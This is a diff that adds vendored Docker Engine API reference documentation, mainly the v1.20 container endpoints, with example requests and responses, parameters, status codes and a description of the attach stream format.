+        "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+        "Name" : "/test",
+        "Driver" : "aufs",
+        "ExecDriver" : "native-0.2",
+        "MountLabel" : "",
+        "ProcessLabel" : "",
+        "AppArmorProfile" : "",
+        "RestartCount" : 0,
+        "Volumes" : {},
+        "VolumesRW" : {}
+      }
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **500** - server error
+
+## 3. Going further
+
+### 3.1 Inside `docker run`
+
+As an example, the `docker run` command line makes the following API calls:
+
+- Create the container
+
+- If the status code is 404, it means the image doesn't exist:
+    - Try to pull it.
+    - Then, retry to create the container.
+
+- Start the container.
+
+- If you are not in detached mode:
+- Attach to the container, using `logs=1` (to have `stdout` and
+      `stderr` from the container's start) and `stream=1`
+
+- If in detached mode or only `stdin` is attached, display the container's id.
+
+### 3.2 Hijacking
+
+In this version of the API, `/attach`, uses hijacking to transport `stdin`,
+`stdout`, and `stderr` on the same socket.
+
+To hint potential proxies about connection hijacking, Docker client sends
+connection upgrade headers similarly to websocket.
+
+    Upgrade: tcp
+    Connection: Upgrade
+
+When Docker daemon detects the `Upgrade` header, it switches its status code
+from **200 OK** to **101 UPGRADED** and resends the same headers.
+
+
+### 3.3 CORS Requests
+
+To set cross origin requests to the Engine API please give values to
+`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all,
+default or blank means CORS disabled
+
+    $ docker -d -H="192.168.1.9:2375" --api-cors-header="http://foo.bar"
diff --git a/vendor/github.com/docker/docker/docs/api/v1.20.md b/vendor/github.com/docker/docker/docs/api/v1.20.md
new file mode 100644
index 0000000000..2532c49950
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/api/v1.20.md
@@ -0,0 +1,2391 @@
+---
+title: "Engine API v1.20"
+description: "API Documentation for Docker"
+keywords: "API, Docker, rcli, REST, documentation"
+redirect_from:
+- /engine/reference/api/docker_remote_api_v1.20/
+- /reference/api/docker_remote_api_v1.20/
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+## 1. Brief introduction
+
+ - The daemon listens on `unix:///var/run/docker.sock` but you can
+   [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket).
+ - The API tends to be REST. However, for some complex commands, like `attach`
+   or `pull`, the HTTP connection is hijacked to transport `stdout`,
+   `stdin` and `stderr`.
+
+## 2. Endpoints
+
+### 2.1 Containers
+
+#### List containers
+
+`GET /containers/json`
+
+List containers
+
+**Example request**:
+
+    GET /v1.20/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Id": "8dfafdbc3a40",
+                 "Names":["/boring_feynman"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 1",
+                 "Created": 1367854155,
+                 "Status": "Exit 0",
+                 "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}],
+                 "Labels": {
+                         "com.example.vendor": "Acme",
+                         "com.example.license": "GPL",
+                         "com.example.version": "1.0"
+                 },
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         },
+         {
+                 "Id": "9cd87474be90",
+                 "Names":["/coolName"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 222222",
+                 "Created": 1367854155,
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         },
+         {
+                 "Id": "3176a2479c92",
+                 "Names":["/sleepy_dog"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 3333333333333333",
+                 "Created": 1367854154,
+                 "Status": "Exit 0",
+                 "Ports":[],
+                 "Labels": {},
+                 "SizeRw":12288,
+                 "SizeRootFs":0
+         },
+         {
+                 "Id": "4cb07b47f9fb",
+                 "Names":["/running_cat"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 444444444444444444444444444444444",
+                 "Created": 1367854152,
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         }
+    ]
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, Show all containers.
+        Only running containers are shown by default (i.e., this defaults to false)
+-   **limit** – Show `limit` last created
+        containers, include non-running ones.
+-   **since** – Show only containers created since Id, include
+        non-running ones.
+-   **before** – Show only containers created before Id, include
+        non-running ones.
+-   **size** – 1/True/true or 0/False/false, Show the containers
+        sizes
+-   **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters:
+  -   `exited=<int>`; -- containers with exit code of  `<int>` ;
+  -   `status=`(`created`|`restarting`|`running`|`paused`|`exited`)
+  -   `label=key` or `label="key=value"` of a container label
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **500** – server error
+
+#### Create a container
+
+`POST /containers/create`
+
+Create a container
+
+**Example request**:
+
+    POST /v1.20/containers/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+           "Hostname": "",
+           "Domainname": "",
+           "User": "",
+           "AttachStdin": false,
+           "AttachStdout": true,
+           "AttachStderr": true,
+           "Tty": false,
+           "OpenStdin": false,
+           "StdinOnce": false,
+           "Env": [
+                   "FOO=bar",
+                   "BAZ=quux"
+           ],
+           "Cmd": [
+                   "date"
+           ],
+           "Entrypoint": null,
+           "Image": "ubuntu",
+           "Labels": {
+                   "com.example.vendor": "Acme",
+                   "com.example.license": "GPL",
+                   "com.example.version": "1.0"
+           },
+           "Volumes": {
+             "/volumes/data": {}
+           },
+           "WorkingDir": "",
+           "NetworkDisabled": false,
+           "MacAddress": "12:34:56:78:9a:bc",
+           "ExposedPorts": {
+                   "22/tcp": {}
+           },
+           "HostConfig": {
+             "Binds": ["/tmp:/tmp"],
+             "Links": ["redis3:redis"],
+             "LxcConf": {"lxc.utsname":"docker"},
+             "Memory": 0,
+             "MemorySwap": 0,
+             "CpuShares": 512,
+             "CpuPeriod": 100000,
+             "CpuQuota": 50000,
+             "CpusetCpus": "0,1",
+             "CpusetMems": "0,1",
+             "BlkioWeight": 300,
+             "MemorySwappiness": 60,
+             "OomKillDisable": false,
+             "PidMode": "",
+             "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+             "PublishAllPorts": false,
+             "Privileged": false,
+             "ReadonlyRootfs": false,
+             "Dns": ["8.8.8.8"],
+             "DnsSearch": [""],
+             "ExtraHosts": null,
+             "VolumesFrom": ["parent", "other:ro"],
+             "CapAdd": ["NET_ADMIN"],
+             "CapDrop": ["MKNOD"],
+             "GroupAdd": ["newgroup"],
+             "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+             "NetworkMode": "bridge",
+             "Devices": [],
+             "Ulimits": [{}],
+             "LogConfig": { "Type": "json-file", "Config": {} },
+             "SecurityOpt": [],
+             "CgroupParent": ""
+          }
+      }
+
+**Example response**:
+
+      HTTP/1.1 201 Created
+      Content-Type: application/json
+
+      {
+           "Id":"e90e34656806",
+           "Warnings":[]
+      }
+
+**JSON parameters**:
+
+-   **Hostname** - A string value containing the hostname to use for the
+      container.
+-   **Domainname** - A string value containing the domain name to use
+      for the container.
+-   **User** - A string value specifying the user inside the container.
+-   **AttachStdin** - Boolean value, attaches to `stdin`.
+-   **AttachStdout** - Boolean value, attaches to `stdout`.
+-   **AttachStderr** - Boolean value, attaches to `stderr`.
+-   **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed.
+-   **OpenStdin** - Boolean value, opens `stdin`,
+-   **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects.
+-   **Env** - A list of environment variables in the form of `["VAR=value", ...]`
+-   **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }`
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Entrypoint** - Set the entry point for the container as a string or an array
+      of strings.
+-   **Image** - A string specifying the image name to use for the container.
+-   **Volumes** - An object mapping mount point paths (strings) inside the
+      container to empty objects.
+-   **WorkingDir** - A string specifying the working directory for commands to
+      run in.
+-   **NetworkDisabled** - Boolean value, when true disables networking for the
+      container
+-   **ExposedPorts** - An object mapping ports to an empty object in the form of:
+      `"ExposedPorts": { "<port>/<tcp|udp>: {}" }`
+-   **HostConfig**
+    -   **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms:
+           + `host-src:container-dest` to bind-mount a host path into the
+             container. Both `host-src`, and `container-dest` must be an
+             _absolute_ path.
+           + `host-src:container-dest:ro` to make the bind-mount read-only
+             inside the container. Both `host-src`, and `container-dest` must be
+             an _absolute_ path.
+    -   **Links** - A list of links for the container. Each link entry should be
+          in the form of `container_name:alias`.
+    -   **LxcConf** - LXC specific configurations. These configurations only
+          work when using the `lxc` execution driver.
+    -   **Memory** - Memory limit in bytes.
+    -   **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap.
+          You must use this with `memory` and make the swap value larger than `memory`.
+    -   **CpuShares** - An integer value containing the container's CPU Shares
+          (ie. the relative weight vs other containers).
+    -   **CpuPeriod** - The length of a CPU period in microseconds.
+    -   **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period.
+    -   **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use.
+    -   **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+    -   **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+    -   **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
+    -   **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not.
+    -   **PidMode** - Set the PID (Process) Namespace mode for the container;
+          `"container:<name|id>"`: joins another container's PID namespace
+          `"host"`: use the host's PID namespace inside the container
+    -   **PortBindings** - A map of exposed container ports and the host port they
+          should map to. A JSON object in the form
+          `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
+          Take note that `port` is specified as a string and not an integer value.
+    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+          exposed ports. Specified as a boolean value.
+    -   **Privileged** - Gives the container full access to the host. Specified as
+          a boolean value.
+    -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
+          Specified as a boolean value.
+    -   **Dns** - A list of DNS servers for the container to use.
+    -   **DnsSearch** - A list of DNS search domains
+    -   **ExtraHosts** - A list of hostnames/IP mappings to add to the
+        container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`.
+    -   **VolumesFrom** - A list of volumes to inherit from another container.
+          Specified in the form `<container name>[:<ro|rw>]`
+    -   **CapAdd** - A list of kernel capabilities to add to the container.
+    -   **Capdrop** - A list of kernel capabilities to drop from the container.
+    -   **GroupAdd** - A list of additional groups that the container process will run as
+    -   **RestartPolicy** – The behavior to apply when the container exits.  The
+            value is an object with a `Name` property of either `"always"` to
+            always restart or `"on-failure"` to restart only when the container
+            exit code is non-zero.  If `on-failure` is used, `MaximumRetryCount`
+            controls the number of times to retry before giving up.
+            The default is not to restart. (optional)
+            An ever increasing delay (double the previous delay, starting at 100mS)
+            is added before each restart to prevent flooding the server.
+    -   **NetworkMode** - Sets the networking mode for the container. Supported
+          values are: `bridge`, `host`, `none`, and `container:<name|id>`
+    -   **Devices** - A list of devices to add to the container specified as a JSON object in the
+      form
+          `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}`
+    -   **Ulimits** - A list of ulimits to set in the container, specified as
+          `{ "Name": <name>, "Soft": <soft limit>, "Hard": <hard limit> }`, for example:
+          `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }`
+    -   **SecurityOpt**: A list of string values to customize labels for MLS
+        systems, such as SELinux.
+    -   **LogConfig** - Log configuration for the container, specified as a JSON object in the form
+          `{ "Type": "<driver_name>", "Config": {"key1": "val1"}}`.
+          Available types: `json-file`, `syslog`, `journald`, `gelf`, `none`.
+          `json-file` logging driver.
+    -   **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist.
+
+**Query parameters**:
+
+-   **name** – Assign the specified name to the container. Must
+    match `/?[a-zA-Z0-9_-]+`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **406** – impossible to attach (container not running)
+-   **409** – conflict
+-   **500** – server error
+
+#### Inspect a container
+
+`GET /containers/(id or name)/json`
+
+Return low-level information on the container `id`
+
+**Example request**:
+
+      GET /v1.20/containers/4fa6e0f0c678/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+	{
+		"AppArmorProfile": "",
+		"Args": [
+			"-c",
+			"exit 9"
+		],
+		"Config": {
+			"AttachStderr": true,
+			"AttachStdin": false,
+			"AttachStdout": true,
+			"Cmd": [
+				"/bin/sh",
+				"-c",
+				"exit 9"
+			],
+			"Domainname": "",
+			"Entrypoint": null,
+			"Env": [
+				"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+			],
+			"ExposedPorts": null,
+			"Hostname": "ba033ac44011",
+			"Image": "ubuntu",
+			"Labels": {
+				"com.example.vendor": "Acme",
+				"com.example.license": "GPL",
+				"com.example.version": "1.0"
+			},
+			"MacAddress": "",
+			"NetworkDisabled": false,
+			"OnBuild": null,
+			"OpenStdin": false,
+			"StdinOnce": false,
+			"Tty": false,
+			"User": "",
+			"Volumes": null,
+			"WorkingDir": ""
+		},
+		"Created": "2015-01-06T15:47:31.485331387Z",
+		"Driver": "devicemapper",
+		"ExecDriver": "native-0.2",
+		"ExecIDs": null,
+		"HostConfig": {
+			"Binds": null,
+			"BlkioWeight": 0,
+			"CapAdd": null,
+			"CapDrop": null,
+			"ContainerIDFile": "",
+			"CpusetCpus": "",
+			"CpusetMems": "",
+			"CpuShares": 0,
+			"CpuPeriod": 100000,
+			"Devices": [],
+			"Dns": null,
+			"DnsSearch": null,
+			"ExtraHosts": null,
+			"IpcMode": "",
+			"Links": null,
+			"LxcConf": [],
+			"Memory": 0,
+			"MemorySwap": 0,
+			"OomKillDisable": false,
+			"NetworkMode": "bridge",
+			"PidMode": "",
+			"PortBindings": {},
+			"Privileged": false,
+			"ReadonlyRootfs": false,
+			"PublishAllPorts": false,
+			"RestartPolicy": {
+				"MaximumRetryCount": 2,
+				"Name": "on-failure"
+			},
+			"LogConfig": {
+				"Config": null,
+				"Type": "json-file"
+			},
+			"SecurityOpt": null,
+			"VolumesFrom": null,
+			"Ulimits": [{}]
+		},
+		"HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname",
+		"HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts",
+		"LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+		"Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39",
+		"Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2",
+		"MountLabel": "",
+		"Name": "/boring_euclid",
+		"NetworkSettings": {
+			"Bridge": "",
+			"Gateway": "",
+			"IPAddress": "",
+			"IPPrefixLen": 0,
+			"MacAddress": "",
+			"PortMapping": null,
+			"Ports": null
+		},
+		"Path": "/bin/sh",
+		"ProcessLabel": "",
+		"ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf",
+		"RestartCount": 1,
+		"State": {
+			"Error": "",
+			"ExitCode": 9,
+			"FinishedAt": "2015-01-06T15:47:32.080254511Z",
+			"OOMKilled": false,
+			"Paused": false,
+			"Pid": 0,
+			"Restarting": false,
+			"Running": true,
+			"StartedAt": "2015-01-06T15:47:32.072697474Z"
+		},
+		"Mounts": [
+			{
+				"Source": "/data",
+				"Destination": "/data",
+				"Mode": "ro,Z",
+				"RW": false
+			}
+		]
+	}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### List processes running inside a container
+
+`GET /containers/(id or name)/top`
+
+List processes running inside the container `id`. On Unix systems this
+is done by running the `ps` command. This endpoint is not
+supported on Windows.
+
+**Example request**:
+
+    GET /v1.20/containers/4fa6e0f0c678/top HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Titles" : [
+         "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD"
+       ],
+       "Processes" : [
+         [
+           "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash"
+         ],
+         [
+           "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10"
+         ]
+       ]
+    }
+
+**Example request**:
+
+    GET /v1.20/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Titles" : [
+        "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND"
+      ]
+      "Processes" : [
+        [
+          "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash"
+        ],
+        [
+          "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10"
+        ]
+      ],
+    }
+
+**Query parameters**:
+
+-   **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef`
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container logs
+
+`GET /containers/(id or name)/logs`
+
+Get `stdout` and `stderr` logs from the container ``id``
+
+> **Note**:
+> This endpoint works only for containers with the `json-file` or `journald` logging drivers.
+
+**Example request**:
+
+     GET /v1.20/containers/4fa6e0f0c678/logs?stderr=1&stdout=1&timestamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1
+
+**Example response**:
+
+     HTTP/1.1 101 UPGRADED
+     Content-Type: application/vnd.docker.raw-stream
+     Connection: Upgrade
+     Upgrade: tcp
+
+     {% raw %}
+     {{ STREAM }}
+     {% endraw %}
+
+**Query parameters**:
+
+-   **follow** – 1/True/true or 0/False/false, return stream. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`.
+-   **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp
+    will only output log-entries since that timestamp. Default: 0 (unfiltered)
+-   **timestamps** – 1/True/true or 0/False/false, print timestamps for
+        every log line. Default `false`.
+-   **tail** – Output specified number of lines at the end of logs: `all` or `<number>`. Default all.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **404** – no such container
+-   **500** – server error
+
+#### Inspect changes on a container's filesystem
+
+`GET /containers/(id or name)/changes`
+
+Inspect changes on container `id`'s filesystem
+
+**Example request**:
+
+    GET /v1.20/containers/4fa6e0f0c678/changes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Path": "/dev",
+                 "Kind": 0
+         },
+         {
+                 "Path": "/dev/kmsg",
+                 "Kind": 1
+         },
+         {
+                 "Path": "/test",
+                 "Kind": 1
+         }
+    ]
+
+Values for `Kind`:
+
+- `0`: Modify
+- `1`: Add
+- `2`: Delete
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Export a container
+
+`GET /containers/(id or name)/export`
+
+Export the contents of container `id`
+
+**Example request**:
+
+    GET /v1.20/containers/4fa6e0f0c678/export HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/octet-stream
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container stats based on resource usage
+
+`GET /containers/(id or name)/stats`
+
+This endpoint returns a live stream of a container's resource usage statistics.
+
+**Example request**:
+
+    GET /v1.20/containers/redis1/stats HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Type: application/json
+
+      {
+         "read" : "2015-01-08T22:57:31.547920715Z",
+         "network" : {
+            "rx_dropped" : 0,
+            "rx_bytes" : 648,
+            "rx_errors" : 0,
+            "tx_packets" : 8,
+            "tx_dropped" : 0,
+            "rx_packets" : 8,
+            "tx_errors" : 0,
+            "tx_bytes" : 648
+         },
+         "memory_stats" : {
+            "stats" : {
+               "total_pgmajfault" : 0,
+               "cache" : 0,
+               "mapped_file" : 0,
+               "total_inactive_file" : 0,
+               "pgpgout" : 414,
+               "rss" : 6537216,
+               "total_mapped_file" : 0,
+               "writeback" : 0,
+               "unevictable" : 0,
+               "pgpgin" : 477,
+               "total_unevictable" : 0,
+               "pgmajfault" : 0,
+               "total_rss" : 6537216,
+               "total_rss_huge" : 6291456,
+               "total_writeback" : 0,
+               "total_inactive_anon" : 0,
+               "rss_huge" : 6291456,
+               "hierarchical_memory_limit" : 67108864,
+               "total_pgfault" : 964,
+               "total_active_file" : 0,
+               "active_anon" : 6537216,
+               "total_active_anon" : 6537216,
+               "total_pgpgout" : 414,
+               "total_cache" : 0,
+               "inactive_anon" : 0,
+               "active_file" : 0,
+               "pgfault" : 964,
+               "inactive_file" : 0,
+               "total_pgpgin" : 477
+            },
+            "max_usage" : 6651904,
+            "usage" : 6537216,
+            "failcnt" : 0,
+            "limit" : 67108864
+         },
+         "blkio_stats" : {},
+         "cpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24472255,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100215355,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 739306590000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         },
+         "precpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24350896,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100093996,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 9492140000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         }
+      }
+
+The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+
+**Query parameters**:
+
+-   **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Resize a container TTY
+
+`POST /containers/(id or name)/resize?h=<height>&w=<width>`
+
+Resize the TTY for container with  `id`. You must restart the container for the resize to take effect.
+
+**Example request**:
+
+      POST /v1.20/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Length: 0
+      Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – No such container
+-   **500** – Cannot resize container
+
+#### Start a container
+
+`POST /containers/(id or name)/start`
+
+Start the container `id`
+
+> **Note**:
+> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body.
+> See [create a container](#create-a-container) for details.
+
+**Example request**:
+
+    POST /v1.20/containers/e90e34656806/start HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already started
+-   **404** – no such container
+-   **500** – server error
+
+#### Stop a container
+
+`POST /containers/(id or name)/stop`
+
+Stop the container `id`
+
+**Example request**:
+
+    POST /v1.20/containers/e90e34656806/stop?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already stopped
+-   **404** – no such container
+-   **500** – server error
+
+#### Restart a container
+
+`POST /containers/(id or name)/restart`
+
+Restart the container `id`
+
+**Example request**:
+
+    POST /v1.20/containers/e90e34656806/restart?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Kill a container
+
+`POST /containers/(id or name)/kill`
+
+Kill the container `id`
+
+**Example request**:
+
+    POST /v1.20/containers/e90e34656806/kill HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **signal** - Signal to send to the container: integer or string like `SIGINT`.
+        When not set, `SIGKILL` is assumed and the call waits for the container to exit.
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Rename a container
+
+`POST /containers/(id or name)/rename`
+
+Rename the container `id` to a `new_name`
+
+**Example request**:
+
+    POST /v1.20/containers/e90e34656806/rename?name=new_name HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **name** – new name for the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **409** - conflict name already assigned
+-   **500** – server error
+
+#### Pause a container
+
+`POST /containers/(id or name)/pause`
+
+Pause the container `id`
+
+**Example request**:
+
+    POST /v1.20/containers/e90e34656806/pause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Unpause a container
+
+`POST /containers/(id or name)/unpause`
+
+Unpause the container `id`
+
+**Example request**:
+
+    POST /v1.20/containers/e90e34656806/unpause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Attach to a container
+
+`POST /containers/(id or name)/attach`
+
+Attach to the container `id`
+
+**Example request**:
+
+    POST /v1.20/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 101 UPGRADED
+    Content-Type: application/vnd.docker.raw-stream
+    Connection: Upgrade
+    Upgrade: tcp
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+**Stream details**:
+
+When using the TTY setting is enabled in
+[`POST /containers/create`
+](#create-a-container),
+the stream is the raw data from the process PTY and client's `stdin`.
+When the TTY is disabled, then the stream is multiplexed to separate
+`stdout` and `stderr`.
+
+The format is a **Header** and a **Payload** (frame).
+
+**HEADER**
+
+The header contains the information which the stream writes (`stdout` or
+`stderr`). It also contains the size of the associated frame encoded in the
+last four bytes (`uint32`).
+
+It is encoded on the first eight bytes like this:
+
+    header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}
+
+`STREAM_TYPE` can be:
+
+-   0: `stdin` (is written on `stdout`)
+-   1: `stdout`
+-   2: `stderr`
+
+`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of
+the `uint32` size encoded as big endian.
+
+**PAYLOAD**
+
+The payload is the raw stream.
+
+**IMPLEMENTATION**
+
+The simplest way to implement the Attach protocol is the following:
+
+    1.  Read eight bytes.
+    2.  Choose `stdout` or `stderr` depending on the first byte.
+    3.  Extract the frame size from the last four bytes.
+    4.  Read the extracted size and output it on the correct output.
+    5.  Goto 1.
+
+#### Attach to a container (websocket)
+
+`GET /containers/(id or name)/attach/ws`
+
+Attach to the container `id` via websocket
+
+Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455)
+
+**Example request**
+
+    GET /v1.20/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+
+**Example response**
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
